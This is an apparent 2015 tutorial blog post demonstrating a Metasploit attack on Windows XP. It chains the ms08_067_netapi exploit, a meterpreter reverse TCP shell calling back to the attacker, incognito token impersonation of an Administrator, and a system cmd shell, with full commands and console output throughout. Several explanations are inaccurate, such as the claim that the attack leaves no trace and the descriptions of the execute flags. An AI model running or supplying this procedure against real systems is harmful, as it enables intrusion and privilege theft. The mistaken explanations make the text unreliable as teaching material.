Ready to Start Your Career?
By: Multi Thinker
July 14, 2015
Metasploit: Incognito Attack
By: Multi Thinker
July 14, 2015
Hi there,This is Metasploit part 1. In a recent article, we learned about the basics and a little bit of configuration. Here, we'll be a little more advanced.
What's meterpreter? Meterpreter is a DLL injector, mostly used to hijack windows security. A list of commands can let us overtake security of Windows and make changes to/access it.Points to note:
- Meterpreter works with TLS
- Meterpreter can edit Windows features/events/scripts/shell , e.g
- Meterpreter can us Listener to receive logs/events about victim as backdoor etc
As you might imagine, this attack vector hits anonymously (it leaves no signs of itself) and can be used to steal a session.Useful information: Windows login / administrator rights - let's assume we have Windows XP service pack 2 installed here. We're on the same LAN or we have the IP (in recent article we learned about how to start
msfcli / msfconsole / metasploit).Let's assume you've now opened that. Set the target by typing RHOST and search the exploit named "
ms08_067_netapi". For using exploits, we know we need to type:use exploit (full path can be found by typing search)Next, type:
msf> use exploit/windows/smb/ms08_067_netapiIt will show you that you're using this exploit:
msf exploit(ms08_067_netapi) >Now, you need to see the options and set RHOST, or the configuration we talked about in a recent article:
msf exploit(ms08_067_netapi) > set RHOST xx.xx.xx.xxIt will become:
RHOST => xx.xx.xx.xx ( this means our RHOST is setuped )Let's Use PayloadsPayloads: Payloads are additional scripts that stand-alone and work with a sequence to take over the victim.Buit-in has its own default payloads. We can even use out own.Using payloads, let's use meterpreter reverse TCP:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcpHit enter and this will appear, meaning your exploit is set up, too:
PAYLOAD => windows/meterpreter/reverse_tcpNext, set up LHOST (local host for using payloads and creating sessions for attack. Of course, we're LHOST and we will give our IP)
msf exploit(ms08_067_netapi) > set LHOST xx.xx.xx.xx
LHOST = > xx.xx.xx.xxThe configurations are complete; let's see the targets/options and what we can do further:
msf exploit(ms08_067_netapi) > show targetsExploit targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows XP SP2 English (NX) 4 Windows XP SP3 English (NX) 5 Windows 2003 SP0 Universal 6 Windows 2003 SP1 English (NO NX) 7 Windows 2003 SP1 English (NX) 8 Windows 2003 SP2 English (NO NX) 9 Windows 2003 SP2 English (NX) 10 Windows XP SP2 Arabic (NX) 11 Windows XP SP2 Chinese - Traditional / Taiwan (NX)We have to choose the kind of OS we need to exploit/attack. We can use NMAP / ZENMAP to learn that information:
msf exploit(ms08_067_netapi) > set TARGET 8
target => 8Let's exploit:
msf exploit(ms08_067_netapi) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (xx.xx.xx.xx:xx -> xx.xx.xx.xx:xx) meterpreter >Choose incognito
meterpreter > use incognitoSee more options for what we can do in incognito using help:
meterpreter > help Command Description ------- ----------- add_group_user Attempt to add a user to a global group with all tokens add_localgroup_user Attempt to add a user to a local group with all tokens add_user Attempt to add a user with all tokens impersonate_token Impersonate specified token list_tokens List tokens available under current user context snarf_hashes -----------We have to see session/tokens to access our victim. To list those tokens, type:
meterpreter > list_token -u Delegation Tokens Available ======================================== NT AUTHORITYLOCAL SERVICE NT AUTHORITYNETWORK SERVICE NT AUTHORITYSYSTEM ThinkerAdministrator Impersonation Tokens Available ======================================== NT AUTHORITYANONYMOUS LOGONWe got the administrator listed. Let's dump it. For dumping, we need to type command with our Victim Target name using slashes:
meterpreter > impersonate_token Thinker//Administrator [+] Delegation token available [+] Successfully impersonated user ThinkerAdministrator let see what we got here, meterpreter > getuid Server username: ThinkerAdministratorThe last step: we need to start Windows cmd. For that, type "
execute -f cmd.exe -i -t"where -f is forcing meterpreter to use cmd, where -i is listing victims and -t is impersonating from it.With shell, we can exploit meterpreter and have full access:
meterpreter > shell Process 2804 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWSsystem32> whoami whoami Thinkeradministrator C:WINDOWSsystem32>Voila! We're now in the Windows system and have full access of it.--Multi Thinker